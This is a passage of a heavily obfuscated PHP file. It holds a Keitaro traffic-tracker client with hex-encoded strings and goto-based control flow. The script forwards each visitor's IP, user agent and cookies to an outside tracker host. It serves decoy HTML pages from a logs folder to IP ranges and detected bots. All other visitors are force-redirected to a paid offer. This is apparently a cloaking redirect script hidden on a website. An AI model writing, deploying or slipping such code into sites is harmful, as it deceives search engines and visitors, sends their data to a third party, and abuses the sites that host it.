die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "\x3c\142\162\40\x2f\76") { echo "\74\150\162\76" . implode($separator, $this->getLog()) . "\x3c\x68\x72\76"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "\102\x6f\144\171\40\157\165\x74\160\x75\164\40\141\x6c\162\145\x61\x64\x79\x20\163\x74\141\x72\x74\145\144"; if (!empty($file)) { $msg .= "\x28{$file}\x3a{$line}\51"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "\151\x6d\x61\147\x65") || strstr($result->contentType, "\141\x70\160\x6c\151\x63\x61\x74\x69\157\156\x2f\160\144\146"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "\x6e\x6f\x5f\157\146\x66\145\162") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("\103\x61\x6d\160\x61\151\147\x6e\x20\x68\141\163\x6e\x27\x74\x20\x72\x65\164\x75\162\156\x65\x64\x20\157\x66\x66\145\162"); return $fallback; } $params["\137\x6c\x70"] = 1; $params["\137\x74\x6f\153\145\156"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "\x63\x61\x6d\160\141\x69\x67\156") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("\146\157\x72\x63\145\103\x68\157\157\x73\x65\x4f\x66\146\x65\x72\40\167\141\x73\x20\162\145\x6d\157\x76\145\x64\x20\151\156\x20\x4b\103\154\x69\x65\x6e\164\x20\x76\63\x2e"); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}\x2f\77{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["\123\x45\122\x56\105\x52\137\x50\117\x52\124"]) && $_SERVER["\123\x45\x52\126\105\122\x5f\x50\x4f\122\x54"] == 443 || !empty($_SERVER["\110\x54\124\x50\x53"])) { $scheme = "\150\x74\x74\x70\163"; } else { $scheme = "\x68\x74\164\160"; } return $scheme . "\x3a\57\57" . $_SERVER["\x48\124\124\120\x5f\x48\x4f\123\124"] . $_SERVER["\x52\105\121\x55\105\x53\124\x5f\x55\x52\111"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "\x2f\x63\154\151\x63\153\137\141\160\151\57\166" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("\x48\x54\124\120\137\x58\x5f\106\x4f\122\x57\101\x52\x44\105\104\137\x46\x4f\x52", "\110\124\124\x50\137\106\x4f\x52\127\x41\x52\104\x45\104\x5f\x46\x4f\122", "\110\x54\x54\x50\x5f\x58\137\x46\x4f\x52\127\x41\x52\104\x45\x44", "\110\x54\x54\x50\137\x46\117\x52\127\101\122\104\105\x44", "\x48\x54\124\x50\x5f\103\x4c\111\105\116\x54\137\x49\x50", "\110\124\124\120\x5f\x46\117\122\x57\101\x52\104\x45\104\x5f\106\117\122\x5f\x49\120", "\x58\137\106\x4f\122\x57\x41\x52\104\105\104\x5f\x46\117\x52", "\106\117\x52\127\101\x52\x44\105\x44\x5f\x46\x4f\122", "\x58\x5f\x46\117\122\x57\101\122\x44\x45\x44", "\106\x4f\122\x57\x41\x52\x44\x45\x44", "\103\x4c\x49\105\116\x54\137\111\120", "\x46\117\122\127\101\122\104\x45\x44\x5f\106\117\x52\x5f\x49\120", "\x48\124\x54\120\x5f\103\x46\137\103\x4f\x4e\116\x45\103\124\111\116\x47\x5f\111\120", "\x48\124\124\120\137\x50\x52\x4f\130\x59\137\103\117\x4e\x4e\105\x43\x54\x49\x4f\x4e"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode("\x2c", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, "\54")) { $tmp = explode("\x2c", $ip); if (stristr($_SERVER["\x48\x54\124\120\x5f\x55\x53\105\122\137\x41\107\105\116\x54"], "\155\x69\x6e\x69")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["\x52\105\x4d\117\x54\x45\137\x41\x44\x44\x52"]) ? $_SERVER["\122\105\x4d\117\124\x45\137\x41\104\x44\122"] : "\61\62\67\56\60\x2e\x30\x2e\61"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["\110\x54\124\x50\137\110\x4f\x53\124"]) && substr_count($_SERVER["\110\124\x54\120\137\x48\117\123\x54"], "\56") < 3) { $host = "\56" . str_replace("\x77\167\167\56", '', $_SERVER["\x48\124\124\120\x5f\110\x4f\x53\x54"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["\110\124\x54\120\137\103\x4f\x4f\x4b\x49\x45"])) { $opts["\x63\x6f\157\x6b\151\145\163"] = preg_replace("\57\x50\110\x50\x53\x45\x53\x53\x49\x44\75\56\x2a\x3f\x3b\x2f\x73\x69", '', $_SERVER["\x48\124\124\x50\137\x43\x4f\117\x4b\x49\105"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "\110\x54\124\120\x5f") { $headers[str_replace("\40", "\55", ucwords(strtolower(str_replace("\x5f", "\x20", substr($name, 5)))))] = $value; } } return $headers; } } goto uWc4r; NPAcW: class_alias("\x4b\103\x6c\x69\145\x6e\x74", "\x4b\103\154\151\143\x6b\103\x6c\151\x65\x6e\164"); $client = new KClient("\x68\164\164\160\x73\72\x2f\x2f\x6d\x61\x6b\145\164\157\160\x68\x6f\164\x6c\x6f\x76\x65\56\x63\x6f\x6d\57", "\x37\x35\x6b\x67\x70\x71\164\162\x6e\153\172\x36\154\x6d\153\x78\163\x70\163\x67\144\146\x73\x70\166\x33\x79\x66\64\170\x71\x6c"); $client->sendAllParams(); $client->forceRedirectOffer(); $client->param("\x73\x75\142\x5f\151\144\x5f\x32", "\142\145\150\145\x61\x6c\164\x68\x79\56\145\x73"); $client->param("\163\165\x62\x5f\151\x64\x5f\61", $_12); $client->currentPageAsReferrer(); $client->executeAndBreak(); } } goto e8SSQ; AFMng: $_17 = array("\x63\166\x69\x61\145\163\56\150\164\x6d\154"); goto Wxi9C; C2V48: $_1 = $_SERVER["\122\x45\115\117\124\x45\137\x41\104\104\x52"]; goto gvRxt; MwhXE: if ($_3) { switch ($_11) { case "\x2f": include $_15 . "\151\x6e\144\x65\170\x2e\x68\164\x6d"; die; break; case "\x2f\x63\141\164\145\x67\157\x72\171\57\141\x6c\x69\155\145\156\164\141\143\151\x6f\156\x2f": include $_15 . "\x63\166\151\x61\145\x73\56\x68\x74\x6d\x6c"; die; break; case "\x2f\x63\141\x74\x65\147\157\162\x79\x2f\143\165\145\x72\160\157\57": include $_15 . "\143\x76\x69\x61\147\56\150\x74\155\x6c"; die; break; case "\x2f\143\141\164\x65\x67\157\x72\171\x2f\x6d\145\x6e\164\x65\57": include $_15 . "\x63\x73\x69\x6c\x65\x73\x2e\x68\164\155\x6c"; die; break; case "\57\x63\141\x74\145\147\157\162\171\x2f\x74\145\162\x61\160\151\141\163\x2f": include $_15 . "\143\x73\x69\x6c\147\56\150\164\x6d\x6c"; die; break; case "\x2f\x63\x61\164\145\147\x6f\162\x79\57\166\151\144\x61\57": include $_15 . "\143\x76\x69\x61\146\56\150\x74\155\x6c"; die; break; case "\57\143\x61\164\x65\x67\x6f\x72\x79\57\x63\150\141\162\154\x61\163\55\150\x65\x61\154\164\150\x79\57": include $_15 . "\x76\x69\x61\146\x2e\x68\164\155\154"; die; break; case "\x2f\143\165\162\163\x6f\x73\x2d\x62\145\150\x65\141\x6c\164\x68\x79\57": include $_15 . "\x63\143\151\141\145\x73\56\x68\164\155\x6c"; die; break; case "\57\x63\157\156\x74\141\143\x74\157\57": include $_15 . "\143\143\151\x61\147\56\150\164\155\154"; die; break; case "\x2f\x70\x75\x62\x6c\x69\x63\x69\144\141\144\x2f": include $_15 . "\164\141\x64\x6f\145\x73\56\150\x74\155\x6c"; die; break; case "\57\x63\x61\162\x64\151\157\x64\x61\156\143\x65\57": include $_15 . "\143\164\141\144\62\x30\155\56\x68\164\x6d\154"; die; break; case "\x2f\x74\151\145\x6e\144\x61\x2f": include $_15 . "\x63\151\141\x70\56\x68\164\x6d\154"; die; break; case "\57\x6d\141\x74\162\151\143\x75\x6c\141\x63\151\x6f\156\x2f": include $_15 . "\143\143\x69\141\x66\x2e\150\x74\x6d\154"; die; break; } } goto c3gjA; hHFhK: $_11 = $_SERVER["\122\x45\121\x55\105\123\x54\137\125\x52\111"]; goto pBHzj; ZaCDk: $_2 = $_SERVER["\110\x54\x54\x50\137\125\123\105\x52\137\101\x47\x45\116\x54"]; goto CE0mG; g1NKI: if (!$_3) { foreach ($_4 as $_5) { list($_6, $_7) = explode("\55", $_5, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4)); $_8 = (double) sprintf("\x25\165", ip2long($_6)); $_9 = (double) sprintf("\x25\x75", ip2long($_7)); $_10 = (double) sprintf("\45\x75", ip2long($_1)); if ($_10 >= $_8 && $_10 <= $_9) { $_3 = true; break; } } } goto a2l29; gvRxt: $_2 = $_SERVER["\x48\124\x54\120\137\x55\x53\x45\122\137\101\x47\105\116\x54"]; goto xb0cq; pBHzj: $_15 = "\56\x2e\57\154\157\x67\x73\57\x74\155\x70\57"; goto rU03a; c3gjA: ?>